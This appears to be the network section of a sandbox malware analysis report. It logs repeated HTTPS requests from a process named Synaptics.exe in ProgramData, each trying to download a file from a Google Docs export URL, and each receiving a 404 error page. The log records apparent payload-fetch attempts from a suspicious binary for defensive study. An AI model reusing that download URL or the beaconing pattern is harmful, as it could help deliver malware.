                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:23 UTC | 76 | IN | Data Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:23 UTC | 76 | IN
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2QCmLkBa5UMVbBw2_3n4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:23 UTC | 77 | IN
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC78INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.3 | 49769 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:23 UTC | 75 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:23 UTC | 78 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 27 May 2022 02:38:23 GMT
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
Content-Security-Policy: script-src 'report-sample' 'nonce-xLDmZzE8U_Q17M8WWwO6Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-05-27 02:38:23 UTC | 79 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UnOTan-iGx4fSwR8KWVDbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:23 UTC | 81 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:23 UTC | 81 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.3 | 49771 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:23 UTC | 78 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:23 UTC | 81 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 27 May 2022 02:38:23 GMT
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-q_WwuXe4XGTluFaUH4GtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Cross-Origin-Opener-Policy: same-origin
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-05-27 02:38:23 UTC | 82 | IN | Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:23 UTC | 82 | IN | Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wP5qirZj-ZZ4GN_JY-qUBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:23 UTC | 83 | IN | Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
2022-05-27 02:38:23 UTC | 84 | IN | Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          27192.168.2.349772172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC81OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC84INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-j4jchXbwVQLmIeHkuwST4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC85INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:24 UTC | 85 | IN | Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HqInpAb4q-UA0p5Ap9EuAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:24 UTC | 86 | IN | Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
2022-05-27 02:38:24 UTC | 87 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.3 | 49773 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:24 UTC | 84 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:24 UTC | 87 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-F69_pKNlsi_vh4bFmrC-yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:24 UTC | 88 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J_ccHA_UVVi8M5U2jH3eQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:24 UTC | 90 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:24 UTC | 90 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.3 | 49776 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:24 UTC | 87 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:24 UTC | 90 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-00CzyXufRNr6eJhID_c9KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:24 UTC | 92 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8SxTRSHiweffjsq6nN3KTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:24 UTC | 93 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:24 UTC | 93 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49742 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:17 UTC | 6 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:17 UTC | 9 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:17 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-8wRx_faYmVTA8D5WLtXo5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:17 UTC | 10 | IN | Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:17 UTC | 11 | IN | Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IAtR19I5J4MsLp-m-Bw-7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:17 UTC | 12 | IN | Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>That’s an error.</ins><p>The requested URL was not
2022-05-27 02:38:17 UTC | 12 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.3 | 49777 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:24 UTC | 90 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:24 UTC | 93 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-EOvmVxVbQaFC3tSzPkmSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:24 UTC | 94 | IN | Data Ascii: 66a<html lang=en><meta ch
2022-05-27 02:38:24 UTC | 94 | IN | Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FbcWRuaiKHhu9Uf8QMKCOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
2022-05-27 02:38:24 UTC | 96 | IN | Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>That’s an error.</ins><p>The requested URL was not
2022-05-27 02:38:24 UTC | 96 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49743 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:19 UTC | 12 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:20 UTC | 15 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-4qLAeArRAnTGw8wdmFdaFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:20 UTC | 17 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UybNnfUTId6PZOGyPPR7KA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:20 UTC | 18 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>
2022-05-27 02:38:20 UTC | 19 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49744 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:19 UTC | 12 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:20 UTC | 12 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-9R5mwl4rYkZg3c-4B7qtMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
